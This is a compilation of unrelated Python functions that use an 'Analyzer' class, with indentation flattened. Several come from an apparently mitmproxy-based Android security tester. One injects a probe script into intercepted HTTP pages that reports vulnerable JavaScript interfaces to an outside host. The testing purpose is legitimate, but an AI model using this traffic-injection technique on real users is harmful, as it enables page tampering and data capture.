def handle_request(self, flow): if flow.request.path.find("?vulnerable_cve_3500") != -1: self.add_to_report( self.get_filter_id(), "Dynamically verified that application is vulnerable to CVE-3500" ) Analyzer.handle_request(self, flow)
def handle_request(self, flow): if flow.request.path.find("?vulnerable_javascript_injection") != -1: visited_url_index = flow.request.path.find("&url=") self.add_to_report(self.get_filter_id(), "Dynamically verified that malicious Javascript can be injected via HTTP via url %s" % base64.b64decode( flow.request.path[visited_url_index + 5:])) Analyzer.handle_request(self,flow)
def test_capture(): print("testing simple capture and advance") print("\tsimple choice white") b = Board() b.board = [[0, 0, 0, 0, 0, 0, 0, -999], [0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0, 0, 0], [-1, 0, -3, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 999]] a = Analyzer() a.sd_limit = 2 res = a.minimax(b, 20) assert(res.move == ((2, 1), (3, 2))) print("\tsimple choice black") b = Board() b.turn = -1 b.board = [[0, 0, 0, 0, 0, 0, 0, 999], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [1, 0, 3, 0, 0, 0, 0, 0], [0, -1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, -999]] # a = Analyzer(20) a.sd_limit = 2 res = a.minimax(b, 20) assert(res.move == ((4, 1), (3, 2)))
def test_endgame_heuristics(): a = Analyzer() b = Board() b.board = [[0, 5, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 999, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [5, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, -999]] res = a.minimax(b, 200) print_move_chain(a, b, res) b = Board() b.turn = -1 b.board = [[0, -5, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, -999, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [-5, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 999]] res = a.minimax(b, 200) print_move_chain(a, b, res)
def __init__(self): self.ToCrawl = set([]) self.Crawled = set([]) self.Crawling = "" self.PageAnalyzer = Analyzer() # used to extract useful info self.PageSniffer = Analyzer() # used to find new pages to crawl self.initBrowser()
def runAnAnalyzer(channels, baseCuts, infile, outdir, maxEvents, intLumi, cleanRows, cutModifiers): ''' Run an Analyzer. Intended for use in threads, such that several processes all do this once. ''' outfile = outdir+'/'+(infile.split('/')[-1]) try: analyzer = Analyzer(channels, baseCuts, infile, outfile, maxEvents, intLumi, cleanRows, cutModifiers=cutModifiers) # Exceptions won't print from threads without help except Exception as e: print "**********************************************************************" print "EXCEPTION" print "Caught exception:" print e print "While initializing analyzer for {} with base cuts {} and modifiers [{}]".format(infile, baseCuts, ', '.join(m for m in cutModifiers)) print "Killing task" print "**********************************************************************" return try: analyzer.analyze() except Exception as e: print "**********************************************************************" print "EXCEPTION" print "Caught exception:" print e print "While running analyzer for {} with base cuts {} and modifiers [{}]".format(infile, baseCuts, ', '.join(m for m in cutModifiers)) print "Killing task" print "**********************************************************************" return
def main(): analyzer = Analyzer(isTest,train_filename,test_filename, test_answers,smoothing,cv_validation_percentage) (predicted, actual, tokens) = analyzer.run() accuracy, ten_mistakes = get_score(predicted,actual, tokens) print "Accuracy: " + str(accuracy) print "Ten Misclassifications: %s"%str(ten_mistakes)
def ch1Graph(self, resultDict, graph, startDate, endDate): ''' Sets title and labels for choice one, and graphs values. Returns analysis string.''' # Graph setup graph.set_title("Stock Price vs Time") # Set graph title graph.set_xlabel("Date") # Set x-axis label graph.set_ylabel("Stock Price") # Set y-axis label # for each stock dictionary in the resultDict (list of dictionaries) for stock in resultDict: # Create list of dates from dictionary dateList = [date for date in sorted(stock['Time Series (Daily)'], key = lambda x: datetime.datetime.strptime(x, '%Y-%m-%d'))] # Create list of prices for corresponding dates prices = [stock['Time Series (Daily)'][date] for date in sorted(stock['Time Series (Daily)'], key = lambda x: datetime.datetime.strptime(x, '%Y-%m-%d'))] # Plot the prices graph.plot(prices, label= stock['Meta Data']['2. Symbol']) # Set legend in the best location graph.legend(loc = 'best') # Set 3 x-axis points graph.set_xticks([0,len(dateList) // 2,len(dateList) - 1]) # Set corresponding dates on x-axis graph.set_xticklabels([dateList[0], dateList[(len(dateList) - 1) // 2], dateList[-1]]) # Analysis a = Analyzer() # Get change and stock name from analysis of dictionary values analysis = a.compareOne(resultDict, startDate, endDate) # Return analysis string to GUI return analysis
def handle_request(self, flow): if flow.request.scheme.endswith("https"): self.add_to_report( self.get_filter_id(), 'SSL connection to host %s, app not validating certificates properly' % (flow.request.headers["Host"][0] + flow.request.path)) Analyzer.handle_request(self, flow)
def getPupil(image, params): analysis = Analyzer(image, params) eyeData = analysis.getEyeData() reflections = eyeData.getReflection() likelyCandidate = eyeData.getPupilCentreCandidate(db.Eyeball.Eyeball.FilterOptions.REFLECTION) return likelyCandidate
def NegaMax(self, board, move, turn, depth, alpha, beta, tilesearchrange): #print("CURRENT POSITION",move,isMaximizingPlayer) if WinChecker(board).CheckBoth() or depth == 0: #print("REACHED TERMINAL") return (Analyzer(board).Grader(self.AIStoneType) - Analyzer(board).Grader(self.EnemyStoneType), move) v = -10000000 for moves in self.aiutils.GetOpenMovesPlus(board, self.OpenSearchRange): score = -self.NegaMax( self.aiutils.GenerateCustomGameBoard( board, moves, self.AIStoneType if turn == self.EnemyStoneType else self.EnemyStoneType), moves, self.AIStoneType if turn == self.EnemyStoneType else self.EnemyStoneType, depth - 1, -beta, -alpha, tilesearchrange)[0] if score > v: v = score alpha = max(alpha, score) if alpha >= beta: print("AB CUTOFF") break return (v, move)
def test_date_before_start_keyerror_should_appear(self): start = "2010-01-01" date = '2009-05-28' tickers = list(gt.get_biggest_n_tickers(40)) b = Analyzer(tickers, start) #self.assertRaises(KeyError, lambda: b.winners(date, 25, 5)) self.assertEqual(b.winners(date, 25, 5), [])
class Builder: def __init__(self): self.grabber = Grabber() self.analyzer = Analyzer() self.manipulator = Manipulator() def convertColor(self, hex_color): value = hex_color.lstrip('#') lv = len(value) return tuple(int(value[i:i+lv/3], 16) for i in range(0, lv, lv/3)) def getCellColors(self, cells, progress_bar=False): cell_colors = [x[:] for x in [[0]*len(cells[0])]*len(cells)] if not progress_bar: for i in range(0, len(cells)): for j in range(0, len(cells[0])): cell_colors[i][j] = self.convertColor(self.analyzer.colorz(cells[i][j], 1)[0]) else: for i in tqdm(range(0, len(cells)), ncols=50): for j in range(0, len(cells[0])): cell_colors[i][j] = self.convertColor(self.analyzer.colorz(cells[i][j], 1)[0]) return cell_colors def calculateContrast(self, color1, color2): term1 = (color1[0] - color2[0])**2 term2 = (color1[1] - color2[1])**2 term3 = (color1[2] - color2[2])**2 return math.sqrt(term1 + term2 + term3) def processImage(self, cell_file): cell_image = self.manipulator.crop_and_resize(Image.open(cell_file), subimage_width, subimage_height) subcells = self.manipulator.split_image(cell_image, 2, 2) cell_image_data = {'pixels':cell_image.tostring(), 'size':cell_image.size, 'mode':cell_image.mode} return(cell_image_data, self.getCellColors(subcells))
def training_phase(self) -> None: """ Trains model and generates graphs. """ print("* Setting up training job.", flush=True) self.train_dataloader = self.get_dataloader( hdf_path=self.train_h5_path, data_description="training set") self.valid_dataloader = self.get_dataloader( hdf_path=self.valid_h5_path, data_description="validation set") self.load_training_set_properties() self.create_output_files() self.analyzer = Analyzer(valid_dataloader=self.valid_dataloader, train_dataloader=self.train_dataloader, start_time=self.start_time) start_epoch, end_epoch = self.define_model_and_optimizer() print("* Beginning training.", flush=True) for epoch in range(start_epoch, end_epoch): self.current_epoch = epoch avg_train_loss = self.train_epoch() avg_valid_loss = self.validation_epoch() util.write_model_status(epoch=self.current_epoch, lr=self.optimizer.param_groups[0]["lr"], training_loss=avg_train_loss, validation_loss=avg_valid_loss) self.evaluate_model() self.print_time_elapsed()
def get_ts_properties(self, molecular_graphs: list, group_size: int) -> None: """ Gets molecular properties for group of molecular graphs, only for the training set. Args: ---- molecular_graphs (list) : Contains `PreprocessingGraph`s. group_size (int) : Size of "group" (i.e. slice of graphs). """ if self.is_training_set: analyzer = Analyzer() ts_properties = analyzer.evaluate_training_set( preprocessing_graphs=molecular_graphs) # merge properties of current group with the previous group analyzed if self.ts_properties: # `self.ts_properties` is a dictionary self.ts_properties = analyzer.combine_ts_properties( prev_properties=self.ts_properties, next_properties=ts_properties, weight_next=group_size) else: # `self.ts_properties` is None (has not been calculated yet) self.ts_properties = ts_properties else: self.ts_properties = None
def ch2Graph(self, resultDict, graph): ''' Sets title and labels for choice two. Calls _placeValues to plot values. Returns analysis string. ''' # Graph setup graph.set_title("Monthly Price Percent Change for Stock Indices NASDAQ, S&P 500, Dow Jones during last 12 Months") # Set title graph.set_xlabel("Date") # Set x-axis label graph.set_ylabel("Percentage Change in Closing Price") # Set y-axis label # For each index in resultDict (dictionary of list) for index in resultDict: # Unzip dates and prices for each index - original dictionary has dates in most recent order dates, prices = zip(*reversed(resultDict[index])) # Create a numpy array and convert each price to float prices = np.array(prices).astype(float) # Compute percent change betwen each data point prices = [0] + ((np.diff(prices)/ prices[:-1]) * 100) # Replace dictionary value with list of dates and price percent change resultDict[index] = [*zip(reversed(dates), reversed(prices))] # Graph dictionary values self._placeValues(resultDict, graph) # Analysis a = Analyzer() # Get percent change and index name from analysis of dictionary values analysis = a.compareTwo(resultDict) # Return analysis string with best performing index and its percent change to GUI return analysis
def generation_phase(self) -> None: """ Generates molecules using a pre-trained model. """ print("* Setting up generation job.", flush=True) self.load_training_set_properties() self.restart_epoch = self.constants.generation_epoch self.analyzer = Analyzer(valid_dataloader=None, train_dataloader=None, start_time=self.start_time) print( f"* Loading model from saved state (Epoch {self.restart_epoch}).", flush=True) model_path = self.constants.job_dir + f"model_restart_{self.restart_epoch}.pth" self.model = self.create_model() try: # for loading models created using GraphINVENT v1.0 (will raise an exception # if model was created with GraphINVENT v2.0) self.model.state_dict = torch.load(model_path).state_dict() except AttributeError: # for loading models created using GraphINVENT v2.0 self.model.load_state_dict(torch.load(model_path)) self.model.eval() with torch.no_grad(): self.generate_graphs(n_samples=self.constants.n_samples) self.print_time_elapsed()
def main(): #configuring Twitter API configurator = Configurator() api = configurator.returnAPI() analyzer = Analyzer(api) analyzer.filterByTerm("created_at", "tweets.json")
def get(self): user = users.get_current_user() if user: analyzer = Analyzer() analyzer.get(self) else: self.redirect(users.create_login_url(self.request.uri))
def handle_request(self, flow): if flow.request.path.find("?vulnerable_javascript_injection") != -1: visited_url_index = flow.request.path.find("&url=") self.add_to_report( self.get_filter_id(), "Dynamically verified that malicious Javascript can be injected via HTTP via url %s" % base64.b64decode(flow.request.path[visited_url_index + 5:])) Analyzer.handle_request(self, flow)
def handle_request(self, flow): if flow.request.path.find("?vulnerable_file_scheme") != -1: activity_index = flow.request.path.find("&activity=") self.add_to_report(self.get_filter_id(), "Dynamically verified that Javascript can be inyected running as file:// scheme via an Intent to " + base64.b64decode( flow.request.path[ activity_index + len( "&activity="):])) Analyzer.handle_request(self,flow)
def __init__(self, fileName): try: self.sourceFile = open(fileName, 'r') except IOError: sys.exit("Source file not found") self.scanner = Scanner(self.sourceFile) self.symbolTableStack = SymbolTableStack() self.analyzer = Analyzer(fileName, self.symbolTableStack)
def __init__(self, query, query_evidences, sf_object): Analyzer.__init__(self, query, query_evidences, sf_object) self.query_answer = sf_object.final_answers[query.id] # load coutry province dict self.world_coutry_province = OrderedDict() f = io.open('data/dict/china_province_dict', 'r', -1, 'utf-8') province_dict = f.read().splitlines() self.world_coutry_province[u'中国'] = province_dict
def __init__(self, parent=None): super(MainWindow, self).__init__(parent) self.analyzer = Analyzer() self.currentSolution = None self._buildUI() self._loadSettings() QTimer.singleShot(0, self._loadInitialData)
def handle_request(self, flow): if flow.request.path.find("?vulnerable_file_scheme") != -1: activity_index = flow.request.path.find("&activity=") self.add_to_report( self.get_filter_id(), "Dynamically verified that Javascript can be inyected running as file:// scheme via an Intent to " + base64.b64decode( flow.request.path[activity_index + len("&activity="):])) Analyzer.handle_request(self, flow)
def test_file_parsing(self): an = Analyzer('data/trash.py', Node) res = an.process_file() self.assertEqual(len(res), 10) first = res[0] self.assertEqual(first.what, "os") self.assertIsNone(first.alias) self.assertEqual(first.who, "data.trash") self.assertEqual(first._extra, "os")
def __init__(self, redis_client: redis.client.Redis): timees = redis_client.get('redditUpdated').decode('UTF-8') print(timees) self.date_updated_reddit = float(timees) self.date_updated_twitter = False self.date_updated_coindesk = False self.redis_client = redis_client #self.preprocessor = Preprocessor(self.redis_client) self.analyzer = Analyzer(self.redis_client)
def simplify_all_clusters(self, euc_dist_threshold, dist_threshold, ang_threshold, min_length, max_length, simplify_size): """ Simplify all the clusters of the participant (which include all the draws) :param simplify_size: :param max_length: max length for stroke :param min_length: min length for stroke :param euc_dist_threshold: argument for group_stroke :param dist_threshold: argument for group_stroke :param ang_threshold: argument for group_stroke :return: Simplify clusters """ print("Start clustering all participant draws") clusters = [] for j, draw in enumerate(self.get_data()): print(f"{j} out of {len(self.get_data())}") clusters.extend( draw.group_strokes(euc_dist_threshold, dist_threshold, ang_threshold, max_num_of_strokes=0, limit_strokes_num=False, fixed_size_of_strokes=False)[1]) self.clusters = clusters print("End clustering all participant draws\n") print("Start simplify all participant clusters") simplify_clusters = [] indexes = [] for i, draw in enumerate(clusters): print(f"{i} out of {len(clusters)}") x = [] y = [] for stroke in draw.get_data(): x.extend(stroke.get_feature('x')) y.extend(stroke.get_feature('y')) p, num_of_stroke_in_simplify = simplify_cluster.simplify_cluster( x, y) if min_length < len(p) < max_length: if simplify_size: Analyzer.set_size(p, simplify_size) error = nearest_neighbor.calc_error(np.stack((x, y), axis=1), p) if error < 15: # if num_of_stroke_in_simplify == 1: indexes.append(i) simplify_clusters.append(p) else: simplify_clusters.append([[0, 0], [5000, 5000]]) print("End simplify all participant clusters\n") return simplify_clusters, indexes
def handle_request(self, flow): if flow.request.path.find("?vulnerable_javascript_injection") != -1: visited_url_index = flow.request.path.find("&url=") interface_url_index = flow.request.path.find("&interface=") self.add_to_report(self.get_filter_id(), "Dynamically verified that malicious Javascript can be injected via HTTP via url %s and can run arbitrary code via the Javascript Interface %s" % ( base64.b64decode( flow.request.path[visited_url_index + len("&url="):]), flow.request.path[interface_url_index + len("&interface="):visited_url_index])) Analyzer.handle_request(self,flow)
def get(self): mid = request.args.get('mid') if mid: an = Analyzer(mid) if an.error: return {'message': 'cannot found talk'} else: an.start() return {'status': 'success'} else: return {'message': 'cannot found mid'}
def setUpClass(cls): cls.tickers = ['AAPL', 'MSFT'] cls.analyzer = Analyzer(cls.tickers, start='2010-01-01') cls.aapl_long_3 = TradingRecord('AAPL', 3, '2010-01-05', cls.analyzer.stock_price('AAPL', '2010-01-05')) cls.aapl_short_3 = TradingRecord('AAPL', -3, '2010-01-15', cls.analyzer.stock_price('AAPL', '2010-01-15')) cls.msft_long_3 = TradingRecord('MSFT', 3, '2010-01-05', cls.analyzer.stock_price('MSFT', '2010-01-05')) cls.msft_short_3 = TradingRecord('AAPL', -3, '2010-01-15', cls.analyzer.stock_price('MSFT', '2010-01-15')) cls.records = {'AAPL':[cls.aapl_long_3, cls.aapl_short_3], 'MSFT':[cls.msft_long_3, cls.msft_short_3]} cls.analyzer_momentum = Analyzer(cls.tickers, start='2010-01-01')
def get_highest_freq_words(doc, n=None, calc_n=True): preprocesser = Preprocesser() d = {doc.id: doc.content} preprocesser.tokenize(d.items(), remove_stopwords=True) doc_tokenized = preprocesser.corpus_tokenized analyzer = Analyzer() freqs = analyzer.get_frequencies(doc_tokenized, None) if calc_n is True: n = int(len(freqs) / 20) elif n is None: n = len(freqs) return dict(freqs[:n])
def get_highest_freq_words(id, n=500, calc_m=True): serializer = Serializer() name = str(id) + "_tokens_stopwords-excluded_cs.corpus" corpus_tokenized = serializer.load(corpora_path + str(id) + "/" + name) analyzer = Analyzer() freqs = analyzer.get_frequencies(corpus_tokenized, n) # if calc_m is True: # m = int(len(freqs)/2) # elif n is None: # m = len(freqs) # return dict(freqs[:m]) return dict(freqs)
def process_thread(): while True: print("analyzing") data_dic = input_queue.get() if data_dic is None: break # use analyzer to trigger the alert myAnalyzer = Analyzer(data_dic["Systolic_BP"], data_dic["Diastolic_BP"], data_dic["Heart_Rate"], data_dic["Heart_O2_Level"], data_dic["Body_temp"]) # call functions to trigger the alert Signal_Loss = myAnalyzer.Signal_Loss(myAnalyzer.Heart_Rate, myAnalyzer.Body_temp) Shock_Alert = myAnalyzer.Shock_Alert(myAnalyzer.Heart_Rate, myAnalyzer.Body_temp) Oxygen_Supply = myAnalyzer.Oxygen_Supply(myAnalyzer.Heart_O2_Level) Fever = myAnalyzer.Fever(myAnalyzer.Body_temp) Hypotension = myAnalyzer.Hypotension(myAnalyzer.Systolic_BP, myAnalyzer.Diastolic_BP) Hypertension = myAnalyzer.Hypertension(myAnalyzer.Systolic_BP, myAnalyzer.Diastolic_BP) # generate regular output base on presented data basic_result = receive_basic_iuput_data(Signal_Loss, Shock_Alert, Oxygen_Supply, Fever, Hypotension, Hypertension) time.sleep(1) print("done") output_queue.put(basic_result)
def process(): # user_id, age, gender, heartrate, Systolic_BP, Diastolic_BP, blood_oxygen, temperature, time): #def __init__(self, Systolic_BP, Diastolic_BP, Heart_Rate, Heart_Oxy_Level, Body_temp): data = Input_module.input() time.sleep(0.5) for idx, content in enumerate(data): process = Analyzer(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"], data[idx]["heartrate"], data[idx]["blood_oxygen"], data[idx]["temperature"]) signal_loss = process.Signal_Loss(data[idx]["heartrate"], data[idx]["temperature"]) shock_alert = process.Shock_Alert(data[idx]["heartrate"], data[idx]["temperature"]) oxygen_supply = process.Oxygen_Supply(data[idx]["blood_oxygen"]) fever = process.Fever(data[idx]["temperature"]) hypotension = process.Hypotension(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"]) hypertension = process.Hypertension(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"]) result = Output_Module.display_basic_iuput_data( signal_loss, shock_alert, oxygen_supply, fever, hypotension, hypertension) print('--------------------------------------') print('Patient No', idx, 'Alert') for index in result: print(index, ':', result[index])
def test_scenarios(): # some puzzles from Reinfeld's Chess Tactics for Beginners print("testing move pruning") a = Analyzer() a.sd_limit = 4 print("\tPuzzle #21") b = Board() b.board = [[0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [0, -1, 9, 0, 0, 0, 0, 0], [0, 0, 0, 0, -999, -1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 999], [0, 0, 0, 0, 0, 0, 0, -1], [0, 0, 0, 0, 0, 0, 0, 0], [-9, 0, 0, 0, 3, 0, 0, 0]] res = a.minimax(b, 100) print_move_chain(a, b, res) assert(res.move == ((7,4),(5,3))) # todo - pawn promotion is required for this one! # print("\tPuzzle #23") # b = Board() # b.turn = -1 # b.board = [[0, 0, 0, 0, 0, 0, 0, 0], # [0, 0, 999, 0, 0, 0, 0, -1], # [-5, 0, 0, 0, 0, 0, 0, 0], # [0, 0, 0, 0, 0, 0, 0, 0], # [0, 0, 0, 0, 0, 0, 0, 0], # [0, 0, 0, 0, 0, 0, 0, 0], # [0, 0, 0, 0, 0, -999, 0, 0], # [0, 0, 0, 0, 0, 0, 0, 5]] # res = a.minimax(b) # print_move_chain(b, res) print("\tPuzzle 52") b = Board() b.turn = -1 b.board = [[0, 0, 5, 0, 0, 0, 999, 0], [0, 0, 0, 0, 0, 1, 1, 1], [1, 0, 0, -9, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0], [-1, -1, 0, 0, 0, 0, 0, -1], [0, 0, 9, 0, 0, -1, -1, 0], [0, 0, 0, -5, 0, 0, -999, 0]] res = a.minimax(b, 100) print_move_chain(a, b, res)
def main(): # user_id, age, gender, heartrate, Systolic_BP, Diastolic_BP, blood_oxygen, temperature, time): data = {} LINES = open("input").read().splitlines() for idx, line in enumerate(LINES): items = line.split() #print(items) Data = input_module(items[0], items[1], items[2], items[3], items[4], items[5], items[6], items[7], items[8]) #Data=input_module.implement_filter(Data) data[idx] = Data.dic print data[idx] #def __init__(self, Systolic_BP, Diastolic_BP, Heart_Rate, Heart_Oxy_Level, Body_temp): for idx, content in enumerate(data): process = Analyzer(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"], data[idx]["heartrate"], data[idx]["blood_oxygen"], data[idx]["temperature"]) signal_loss = process.Signal_Loss(data[idx]["heartrate"], data[idx]["temperature"]) shock_alert = process.Shock_Alert(data[idx]["heartrate"], data[idx]["temperature"]) oxygen_supply = process.Oxygen_Supply(data[idx]["blood_oxygen"]) fever = process.Fever(data[idx]["temperature"]) hypotension = process.Hypotension(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"]) hypertension = process.Hypertension(data[idx]["Systolic_BP"], data[idx]["Diastolic_BP"]) result = Output_Module.display_basic_iuput_data( signal_loss, shock_alert, oxygen_supply, fever, hypotension, hypertension) print 'Patient', idx, 'Alert' print result
def handle_response(self, flow): print "request path is %s " % flow.request.path # If it's injectable and it's not the injected request requested_site = flow.request.headers["Host"][0] if flow.request.scheme.endswith("http") and requested_site.find( "www.fundacionsadosky.org.ar") == -1: visited_url = base64.b64encode(requested_site + flow.request.path) #taken from www.droidsec.org/tests/addjsif/ script = '''vulnerable=[];for(i in top){el=top[i];if(el==null){continue};if(typeof(el)==='function'){continue}try{top[i].getClass().forName('java.lang.Runtime');vulnerable.push(i)}catch(e){}}if(vulnerable.length>0){var request=new XMLHttpRequest();request.open("GET","http://www.fundacionsadosky.org.ar/?vulnerable_javascript_injection=true&interface="+vulnerable.join()+"&url=''' + visited_url + '''",true);request.onreadystatechange=function(){};request.send()}''' content_type = flow.response.headers.get("Content-Type") if not content_type: content_type = flow.response.headers.get("Content-type") if content_type and "text/html" in content_type[0]: with decoded(flow.response ): # automatically decode gzipped responses. if flow.response.content: try: response = flow.response.content print "Response is " + response root = lxml.html.fromstring(response) if root.find('.//*') is not None: print "TRIED MODIFYING /html " + requested_site + flow.request.path # is HTML, use lxml to insert to head, body or script append_in = root.find('.//head') if append_in is None: append_in = root.find('.//body') elif append_in is None: append_in = root.find( './/script').getparent() else: append_in = root script = lxml.html.fromstring('<script>' + script + '</script>') if append_in is not None: append_in.append(script) flow.response.content = lxml.html.tostring( root) except: print "There was a problem parsing the html response, skip it" # mimetype may be application/javascript or text/javascript elif content_type and "javascript" in content_type[0]: with decoded(flow.response ): # automatically decode gzipped responses. print "TRIED MODIFYING /javascript " + requested_site + flow.request.path # is searching for library .JS (both cases sensitive) or JQUERY flow.response.content = script.encode( "utf-8") + flow.response.content Analyzer.handle_response(self, flow)
def test_ticker_not_momentum_before_list(self): start_date = "2010-01-01" ranking_period = 25 n = 5 listeddate = "2010-06-28" s = 'TSLA' tickers = list(gt.get_biggest_n_tickers(40)) b = Analyzer(tickers, start_date) self.assertEqual( b.appeartimes(start_date, ranking_period, n, listeddate, s, volume_filter=False), (0, 0))
def analyze(self, resource): analysis = Analyzer.analyze(self, resource) analysis.add_messages(self._lib_message_list) if self._js_lint_proc_args is None: analysis.mark_as_bad() analysis.add_error('No suitable JSLint runner (cscript.exe, node.js or rhino) could be found.') return analysis try: js_lint_proc = subprocess.Popen(self._js_lint_proc_args, -1, None, subprocess.PIPE, subprocess.PIPE, subprocess.PIPE) js_lint_proc_outputs = js_lint_proc.communicate(resource.content) except Exception as e: analysis.add_error("An exception what thrown while running JsLint: %s\n%s" % (str(e), traceback.format_exc)) return analysis # The JSLint process returns 1 if it finds lint if js_lint_proc.returncode != 0 and js_lint_proc.returncode != 1: analysis.add_error('The JSLint process exited with return code %d\nArguments: %s\n Output: %s' % (js_lint_proc.returncode, self._js_lint_proc_args, js_lint_proc_outputs)) return analysis analysis.mark_as_good() # Assume that JSLint produced no complaints until parsing one from the process output for js_lint_proc_output in js_lint_proc_outputs: js_lint_complaints = js_lint_proc_output.split("Lint at ") for complaint in js_lint_complaints: if len(complaint.strip()): analysis.mark_as_bad() js_lint_complaint = JsLintComplaint(complaint) analysis.add_error(str(js_lint_complaint)) return analysis
def find_matches( workflow_dir,keywords ): workflows = Workflow.workflows_for_filestrings( Seeker.file_strings( workflow_dir ) ) keyword_set = KeywordSet( keywords ) if keyword_set.is_valid() == False: print(" > Invalid keywords") sys.exit() return Analyzer.workflows_for_keywords( keyword_set,workflows )
def handle_game_create(json, methods = ["GET", "POST"]): if json["gid"] == "lobby" or json["gid"] in games.keys(): return grid = Grid(json["width"], json["height"], True) analyzer = Analyzer(lexicons.get(json["language"].lower(), lexicons["english"]), json["language"]) games[json["gid"]] = Game(json["gid"], GameProperties(min_letters = json["minLetters"], minutes = json["minutes"]), grid, analyzer, send_game_update, list_request_callback, send_analysis_callback) socketio.emit("game_list_update", { gid:(g.encode()) for gid,g in games.items() }, room = "lobby")
def infomation_crew(self): # 一条一条取 total_count = 20000 i = 0 while i < total_count: i += 1 # 去除诗词的详情页url info = self.db.select_unanalyzed_infomation() if info is not None: # 下载分析 url = info['url'] html = Downloader.get_html(url, 'infomation') if html: content = Analyzer.get_info_detail(html) if content: self.db.update_infomationurl(url, content) print '%d/%d %s %s' % (i, total_count, info['title'], url) else: self.db.insert_error('analyze_info_detail_error', 7, 'reason', url) else: self.db.insert_error('download_info_detail_error', 6, 'reason', url) else: # 没有了 return
class Processor(object): def __init__(self, datafile='data.txt', statsNum=3): self.analyzer = Analyzer() self.classificator = Classificator() self.datafile = datafile self.statsNum = statsNum def writeStats(self, files): datafile = open(self.datafile, 'w') for file in files: ffts = self.analyzer.getFFTs(file) stats = self.analyzer.getStats(ffts) datafile.write(' '.join(str(x) for x in stats) + '\n') datafile.close() def normalize(self, data): transposed = data.transpose() meanVal = 1 for i in range(len(transposed)): if i % self.statsNum == 0: meanVal = np.mean(transposed[i]) transposed[i] /= meanVal data = transposed.transpose() return data def cluster(self, files, clustersNum): self.writeStats(files) datafile = open(self.datafile) data = datafile.split('\n') data = np.array([[float(x) for x in row.split(' ')] for row in data[:-1]]) data = self.normalize(data) net = self.classificator.newnet(clustersNum) net.train(data, epochs=500) result = net.sim(data) self.classificator.savenet(net) return self.classificator.getGroupedResult(result) def classify(self, file): ffts = self.analyzer.getFFTs(file) stats = self.analyzer.getStats(ffts) net = self.classificator.loadnet() return net.sim(stats)
def __init__(self, automaton): self.exps = [] self.automaton = automaton self.simulation = Simulation(automaton, False) self.analyzer = Analyzer(automaton) self.repeat = 1.0 self.simulation.DEBUG_ITERATIONS = -1 self.directory = "exps" self.log = False
def poem_list_crew(self): for i in range(1, 6): url = 'http://www.haoshiwen.org/type.php?x=%d' % i content = Downloader.get_html(url, 'poemlist') if content: page_count = Analyzer.get_page_count(content) # 分析 for j in range(1, page_count + 1): page_url = 'http://www.haoshiwen.org/type.php?x=%d&page=%d' % (i, j) # 入库 self.db.insert_url(page_url, 1) # 判断是否分析过 if self.db.url_analyzed(page_url): pass else: content = Downloader.get_html(page_url, 'poemlist') if content: # 分析诗的列表 poems = Analyzer.get_poems_from_list_page(content) if poems: # 入库 self.db.insert_urls(poems, 2) self.db.update_url(page_url) print '%d %d/%d: %s' % (i, j, page_count, page_url) else: if Analyzer.check_poem_list_last_page(content): # 最后一页 break else: print u'分析失败' self.db.insert_error('analyze_poem_list_error', 3, 'reason', page_url) # 错误入库:analyze_poem_list_error else: print u'获取页面诗词列表错误' self.db.insert_error('get_poem_list_error', 2, 'reason', page_url) # 错误入库:get_poem_list_error else: print u'分析首页失败' self.db.insert_error('analyze_poem_list_first_page_error', 1, 'reason', page_url)
def record_and_play_audio(): record_seconds = 5 fs = 44100 p = pyaudio.PyAudio() odata = np.zeros(fs * record_seconds) print "Recording audio for the next {0} seconds".format(record_seconds) record_audio(odata, p, fs, record_seconds) wavio.write("before.wav", 44100, odata) print "Audio has recorded, stand by for voice" play_audio(odata, p, fs) print "Encoding and decoding voice through vocoder" analyzer = Analyzer(odata, 10e-3) lpc_frame_array = analyzer.encode() synthesizer = Synthesizer(lpc_frame_array) reconstructed_signal = synthesizer.decode() wavio.write("test.wav", 441000, reconstructed_signal) print "Playing reconstructed audio" play_audio(reconstructed_signal, p, fs) p.terminate()
def user_crawl(self, user_id): html = self.server.get_user_info(user_id) if html: user_info = Analyzer.get_user_info(html) if user_info: # 入库 self.db.insert_use_info(user_info) else: Logger.error(1, "用户数据解析失败") else: Logger.error(1, "用户数据下载失败")
def get_loan_list(url, cache, use_cookie=False): """ 获取散标列表, 返回列表 """ domain = PaipaiDai.get_domain(url) data, cache = Server.get(url, cache=cache, use_cookie=use_cookie) if data: data, next_page = Analyzer.get_loan_list(data) if next_page: next_page = os.path.join(domain, next_page.lstrip('/')) return data, next_page, cache return [], None, False
